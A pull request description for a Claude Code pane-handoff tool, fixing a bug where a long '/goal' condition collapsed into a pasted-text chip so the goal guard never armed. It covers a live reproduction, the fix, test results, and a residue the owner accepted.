         (#682), so the argument is the whole point of sending it at all."""


### PR DESCRIPTION
## What was broken

The wired pane handoff built one payload, `"/goal " + condition`, and sent it as a single paste.
Claude Code collapses a large bracketed paste into one `[Pasted text #N]` chip, so the `/goal `
prefix was collapsed with the condition. No slash command reached the input box, the Enter submitted
an ordinary message, and the successor ran an autonomous handoff with no guard — while every step
reported success.

`skills/pane-handoff/SKILL.md` claimed the wired path already handled this and "nothing here needs
changing". That claim described the broken shape as the fix, which is why it survived.

## Reproduced live before fixing

Throwaway pane, 2026-08-08, created and closed inside the run:

| Arm | What was sent | What the input box showed | Armed? |
|---|---|---|---|
| A | `/goal ` + 3,574-char condition, ONE send | `❯ [Pasted text #1 +20 lines]` | no |
| B | `/goal ` then the condition, TWO sends | `❯ /goal [Pasted text #2 +20 lines]` | **yes** |
| C | `/goal ` + 483-char condition, ONE send | `❯ /goal PROBE ONLY — …` in full | n/a |

Arm B's Enter produced the `◎ /goal active` indicator and a stamped
`goal_status sentinel=true met=false` transcript row whose condition matched byte-for-byte.

Arm C is why this hid for so long: the collapse is length-gated, and every unit test in this area
used a short condition, so they all passed against the broken shape.

## The change

`build_send_text_goal_argv` returns the sends as a LIST — `/goal ` alone, then the condition — so a
caller iterating it cannot silently drop the command. Both loops in `hooks/launcher_lib.py` send
every element, record each one, and abort on any send's failure with a `failed_step` naming which
send failed.

Unchanged by construction: truncation still caps the whole command including the prefix, the
condition send still carries exactly what the successor's `goal_status` row will hold (so
`goal_armed` and predecessor teardown still match), the trailing-newline strip stays at the
`goal_text` choke point, and the goal still goes LAST after `prompt_landed`.

## Known residue, accepted by owner decision 2026-08-08

If the command send lands and the condition send does not, the pane keeps a bare `/goal ` in its
input box. It is deliberately not cleared: every key that clears the box (`ctrl+c`, `esc`) also
interrupts the pane's running turn, so tidying up would cost a healthy successor its in-flight work
to remove a prefix nobody may ever type after. The residue only arises inside a handoff that has
already failed loudly. The abort order is pinned by test so it cannot drift into "send the Enter
anyway", and both loops carry a comment naming the trade-off.

## Verification

- Full suite: **6474 passed, 0 failed, exit 0**, against a baseline of 6466 recorded before any work
  started. Delta +8, exactly the tests added.
- Both lint lanes: 10.00/10, exit 0.
- Cross-model code review (`gpt-5.6-sol`) returned one High finding — the residue above. It was
  confirmed against the code, put to the owner, and resolved by their decision rather than silently
  applied or dropped.
- Branch protection on `main` probed: unprotected, no server-side required checks.

## Not touched

The `/goal` ordering rule, the settle timer, `read-goal-condition`, `validate_goal_carry`, the
`/goal clear` send (short, never collapses), and the hand-carried human path, which the skill
already documented correctly.

Closes #1007
